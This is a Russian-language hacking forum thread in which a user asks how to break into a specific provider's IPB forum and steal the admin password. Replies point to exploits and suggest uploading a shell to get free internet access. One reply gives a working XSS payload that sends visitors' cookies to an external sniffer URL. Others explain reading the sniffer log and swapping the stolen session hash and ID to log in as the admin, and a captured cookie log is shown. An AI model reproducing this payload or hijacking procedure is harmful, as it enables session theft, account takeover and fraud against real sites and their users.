Есть форум (forum.prov.ru) Знаю, что он на IPB, но проблемма в том, что я незнаю версию. Скажите как взломать этот форум, и достать пароль админа ? Только не надо все готовое - я сам хочу взломать.
Версия: _http://forum.prov.ru/admin.php Как взломать: Сам же сказал, что сам хочешь. Поиск по форуму используй.
пробуй сплойт для ipb до 2.0.4 на rst.void.ru если не подойдет сплойт можно вывод что это версия форума либо 2.0.4 либо выше,наверно понятно =)
Азазель это же дама ) 2diablo если ето провайдера форум и у тебя получиться попасть в админку сможешь залить шелл через смайлики или если неполучиться так прочитай статью на сайте или в форуме есть тема я создавал там как залить в папку открытую на запись папки (/uploads/ u /lang/-воснавном ета папка открыта когда форум русифицируют ну где смотрел везде в нее есть доступ на запись так вот главное можешь заить анонимайзер какойнить и получить инет нахаляву ---------------------------------------------------- 1 если тебя спалят а это обязательно тебя либо отключат и ты заплатишь за штраф и за траффик 2.либо просто заплатишь за траффик
А больше ничего делать и не нужно=))) лол Ты прям так сказал вроде зарегаться на форуме это уже пол дела. А если серьёзно, то попробуй XSS-атаку провести. Юзай поиск по форуму это уже не раз обсуждалось. ЗЫ вот попробуй заюзать: HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` С тебя репутация, если помог=))))
Это код, который нужно запостить на форуме или всунуть в подпись. А потом смотришь лог сниффера, который ты укажешь ( в примере это http://antichat.ru/cgi-bin/s.jpg?) и тама будут куки=)) Которые можно всунуть вместо своих или расшифроывть хэш и получить пароль юзера из чьих куков ты вытащил этот самый хэш. НО в твоём случае (IPB 2.0.4) расшифровать хэш неудасться. Тоесть под админом ты зайдёшь (если куки отснифаешь), но в админку не попадёшь. Фух=) Думаю всё понятно объяснил=)))) ЗЫ http://antichat.ru/cgi-bin/s.jpg? это сам сниффер, а лог находится по адресу http://antichat.ru/sniff/log.php
D1mOn Я смотрел. А тебе хочу сказать, что этот способ вытаскивания СОЛИ имхо уже почти на всех форумах не пашет. А без соли до старости брутить будешь
Блин. 1. Видео Coyl Для версий ниже 2.0.4 2. Он ломает через XSS, то есть соли у него нет! Не вводи людей в заблуждение.
Вот что получилось, после написания сообщения. REFERER=http://forum.prov.ru/index.php?act=Post&CODE=08&f=15&t=3018&p=28228&st= QUERY=member_id=[ТУТ МОЙ ID]; pass_hash=[И КАК Я ПОНЯЛ ХЭШ ТОЖЕ МОЙ]; forum_read=a:38:{i:6;i:1134040767;i:67;i:1129806770;i:8;i:1134042471;i:15;i:1133611554;i:29;i:1130761837;i:39;i:1133201153;i:53;i:1132441062;i:36;i:1133359705;i:38;i:1133969210;i:42;i:1132508047;i:3;i:1133113948;i:16;i:1130760137;i:5;i:1133069997;i:7;i:1132494509;i:22;i:1133882625;i:0;i:1132854238;i:34;i:1131694957;i:45;i:1132471894;i:23;i:1132472085;i:4;i:1133587911;i:2;i:1132494411;i:58;i:1133270999;i:27;i:1133877568;i:50;i:1131688492;i:63;i:1131702833;i:57;i:1131608719;i:40;i:1132654583;i:70;i:1131968061;i:41;i:1133028326;i:14;i:1131631814;i:59;i:1131695071;i:61;i:1131703952;i:37;i:1132471439;i:32;i:1131710395;i:52;i:1131867491;i:12;i:1132494525;i:51;i:1133271011;i:65;i:1134042675;}; anonlogin=-1; collapseprefs; open_qr=0; bbmode=normal; session_id=38219acbf90cc236847b83d355b503ae; modtids=,; topicsread=a:3:{i:2866;i:1134042466;i:177;i:1134042366;i:3018;i:1134042916;} AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102))
Azazel Я пробовал тот сплоит который был в видео на этом форуме у меня лн не пошел... Пробовал другие также. Diablo Ну правильно XSS работает... Теперь жди чтоб в место твоего ID и Хэша прилетели ID и Хэш Админа
Ну всё ок. Если ты по Id уверен, что это твои куки, то тогда жди другие=)) Потом когда будут не твои куки, то ты сможешь через Оперу (во встроенном редакторе кук) поменять свой хэш и Id на то, что тебе придёт=))) Вот и всё. После обновления страницы ты будешь тем, чьи куки пришли.
